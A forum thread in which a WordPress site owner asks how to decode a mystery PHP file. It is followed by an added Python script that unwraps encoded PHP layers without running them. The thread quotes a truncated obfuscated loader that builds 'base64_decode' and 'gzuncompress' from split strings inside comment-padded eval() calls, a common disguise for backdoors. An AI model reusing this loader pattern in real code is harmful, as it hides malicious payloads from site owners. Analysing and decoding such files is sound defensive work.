mystery php file question

MisterG Member
edited November 2015 in Help

I have come across a mystery php file in one of my WordPress sites. The whole file is code. What can I use to convert it so I can see what it is doing? Prefer something in Linux but I can use Windows too.

This is just a snip of the code so you can tell what I am talking about.


Comments

  • pastebin.com all the contents.

  • timnboys Member
    edited November 2015

    Well, is it ionCube encoded, or just base64 encoded? Basically, could you show the header of the file?

  • MisterG Member
    edited November 2015

    @timnboys Looks like base64 and it is uncompressing something.

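    ```php
    <?php
    // Concatenation spells out "base64_decode"
    $wpconfig = "b" . "a" . "s" . "e" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "d" . "e";
    // Concatenation spells out "gzuncompress"
    $wordpress1 = "g" . "z" . "u" . "n" . "c" . "o" . "m" . "p" . "r" . "e" . "s" . "s";
    // The inline comments only pad the call: eval(gzuncompress(base64_decode('...')))
    eval/*test*/(/*test*/$wordpress1/*test*/(/*test*/$wpconfig('eNq9fflTU0nX8L/yTNXUDHwE3qyQjB/
    ```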

  • timnboys Member
    edited November 2015

    Okay, just pastebin the contents, as I can easily decode the base64 for you.
    Also, it looks like a half-baked obfuscation system someone used. Either give me the contents in PM or whatever and I will decode it for you and get the base code back.
    They use base64 + gzip deflate a lot, thinking it really obfuscates the code when it doesn't, and it can easily be decoded back by people like me who know its structure, etc.

  • @timnboys I sent it over as a PM. Are you hand decoding or is there something I can run to decode myself if this happens again? Thank you for your help.

  • And that was the time someone on LET was tricked into cracking badly obfuscated proprietary code.

  • @Aga said:

    And that was the time someone on LET was tricked into cracking badly obfuscated proprietary code.

    lol

  • timnboys Member
    edited November 2015

    @MisterG said:
    timnboys I sent it over as a PM. Are you hand decoding or is there something I can run to decode myself if this happens again? Thank you for your help.

    Redacted

  • Considering that's just a badly obfuscated hack, I still like my version of the story better :P

  • Aga said: And that was the time someone on LET was tricked into cracking badly obfuscated proprietary code.

    Anyone that can "crack" (rather: reverse) it has an idea what it does then also - I doubt they'd just send back the unencoded file if they notice it is a WHMCS core licensing file or whatever.

  • William said: I doubt they'd just send back the unencoded file if they notice it is a WHMCS core licensing file or whatever.

    I agree with you, maybe it was not very clear but my comment was meant to be a joke.

  • @Aga said:

    Really? Because your comments come off as mean, sorry, but that is how it appears to me.
    And if it was a joke but didn't sound like one, at least put something like it was a joke or something so people don't think you're being serious (as proprietary code is very important and I don't want to let anyone cheat the dev/author of something out of their well-deserved, hard-earned cash).

  • @timnboys Thank you for your help I really appreciate it.
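
For the question raised in the thread about something to run when this pattern turns up again, the following is an added example (not code from any poster in this thread): a Python script that peels the `eval(gzuncompress(base64_decode('...')))` wrapper from the snippet above as plain data, without executing any PHP. The names `normalise`, `unwrap` and `DECODERS` and the sample payload are constructed for illustration, and it goes beyond the thread's case by also handling `gzinflate`, `gzdecode` and `str_rot13` layers.

```python
import base64
import codecs
import re
import zlib

# PHP wrapper name -> Python equivalent (bytes in, bytes out).
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzuncompress": zlib.decompress,                 # zlib stream
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw deflate
    "gzdecode": lambda b: zlib.decompress(b, 31),    # gzip container
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
}
JOIN = re.compile(r"""(["'])([^"']*)\1\s*\.\s*(["'])([^"']*)\3""")
ASSIGN = re.compile(r"""\$(\w+)\s*=\s*["'](\w+)["']\s*;""")
CALL = re.compile(r"""eval\s*\(\s*((?:\w+\s*\(\s*)+)(["'])([A-Za-z0-9+/=\s]+)\2""")

def normalise(php):
    """Undo the cosmetic tricks: comment padding, split strings, variable functions."""
    php = re.sub(r"/\*.*?\*/", "", php, flags=re.S)
    while JOIN.search(php):
        php = JOIN.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', php)
    names = dict(ASSIGN.findall(php))
    return re.sub(r"\$(\w+)(?=\s*\()", lambda m: names.get(m.group(1), m.group(0)), php)

def unwrap(php, max_layers=10):
    """Peel eval(wrapper(...('payload'))) layers as data; nothing is executed."""
    for _ in range(max_layers):
        m = CALL.search(normalise(php))
        if m is None:
            break
        data = m.group(3).encode()
        for func in reversed(re.findall(r"\w+", m.group(1))):  # innermost call first
            if func not in DECODERS:
                raise ValueError("unsupported wrapper: " + func)
            data = DECODERS[func](data)
        php = data.decode("utf-8", "replace")
    return php

# Constructed sample: harmless payload wrapped the same way as the snippet in the thread.
INNER = '<?php echo "constructed sample payload"; ?>'
def _dots(s):
    return " . ".join('"%s"' % c for c in s)
SAMPLE = ('<?php $wpconfig = ' + _dots("base64_decode") + ';\n'
          '$wordpress1 = ' + _dots("gzuncompress") + ';'
          "eval/*test*/(/*test*/$wordpress1/*test*/(/*test*/$wpconfig('"
          + base64.b64encode(zlib.compress(INNER.encode())).decode() + "')));")
if __name__ == "__main__":
    print(unwrap(SAMPLE))
```

A wrapper function that is not in `DECODERS` raises `ValueError` naming it, so the file can be inspected by hand rather than silently half-decoded.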
